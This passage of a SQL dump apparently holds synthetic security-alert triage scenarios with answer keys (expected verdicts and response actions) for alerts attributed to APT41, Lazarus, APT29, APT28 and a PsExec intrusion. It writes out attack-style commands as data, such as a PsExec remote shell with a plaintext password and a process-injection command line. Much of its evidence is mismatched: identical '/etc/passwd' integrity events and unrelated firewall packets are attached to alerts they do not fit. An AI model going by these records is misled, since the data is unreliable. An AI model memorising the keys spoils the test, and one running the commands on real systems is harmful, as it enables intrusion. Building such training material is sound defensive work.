Analysis\",\"verdict\":\"clean\",\"details\":\"Routine script execution for maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine administrative tasks were misclassified due to the nature of PowerShell usage across the network.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.237Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"IT-SERVER\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1762, 'False Detection of SQL Injection on Public Website', 'low', 'Firewall', 'Firewall alert triggered by legitimate parameter inputs misidentified as SQL injection attempts.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.30\",\"username\":\"guest\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"SELECT * FROM users WHERE username=\'admin\' AND password=\'pass123\'\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"SELECT * FROM users WHERE username=\'admin\' AND password=\'pass123\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate parameter input for application testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The alert was triggered by normal application testing activities, not an actual SQL injection attempt.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1763, 'APT41 Fileless Malware Detected via Process Hollowing', 'critical', 'ThreatConnect', 'A process hollowing attack initiated by APT41 was detected on an internal server. The malware operates in memory only, making it difficult to detect using traditional methods.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:24:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"hostname\":\"corp-server-01\",\"command_line\":\"svchost.exe --inject --target=explorer.exe\",\"file_hash\":\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for fileless malware activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to APT41 fileless malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"svchost.exe --inject --target=explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as process hollowing technique\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 is a known actor utilizing fileless malware techniques like process hollowing.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1764, 'Lazarus Group Phishing Campaign Using Spoofed Domains', 'high', 'MISP', 'A phishing email from a domain mimicking a trusted partner was identified, containing a malicious link intended to harvest credentials.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"username\":\"mwhite\",\"hostname\":\"mail-server-02\",\"email_sender\":\"no-reply@trusted.com\",\"url\":\"http://login.trusted.com/secure-update\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used in multiple phishing campaigns linked to Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.trusted.com/secure-update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing landing page\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@trusted.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in spoofing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email domain closely resembles a trusted partner, indicating a sophisticated phishing attempt by Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1765, 'Cozy Bear APT29 DGA Domain Communication Detected', 'critical', 'Recorded Future', 'Network traffic analysis revealed communication with a domain generated by a Domain Generation Algorithm (DGA) associated with Cozy Bear.', 'Data Exfil', 'T1071.004', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-07\",\"domain\":\"xj3slkjv.com\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with DGA domains used by Cozy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xj3slkjv.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"DGA domain linked to Cozy Bear C2 infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected DGA domain is known to be used by Cozy Bear for covert data exfiltration.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1766, 'Fancy Bear APT28 Supply Chain Attack via GitHub', 'high', 'Anomali', 'APT28 utilized a compromised GitHub repository to deliver a malicious update, executing a payload on the victim\'s system.', 'Malware', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:17:31Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"10.1.1.100\",\"username\":\"admin\",\"hostname\":\"update-server\",\"file_hash\":\"abc1234567890def1234567890abcdef\",\"command_line\":\"malicious_update.exe\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fancy Bear\'s supply chain attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc1234567890def1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious update file used in supply chain attack\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of malicious payload\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT28 is known for supply chain attacks using compromised repositories.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1767, 'Lateral Movement Detected via PSExec', 'critical', 'Wazuh', 'An unauthorized PSExec execution was detected indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:05:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"192.168.10.20\",\"username\":\"hacker\",\"hostname\":\"compromised-host\",\"command_line\":\"psexec \\\\\\\\192.168.10.20 -u admin -p password cmd.exe\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal source IP for PSExec\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Target IP for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.10.20 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command indicating lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage indicates lateral movement attempt within the network.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password 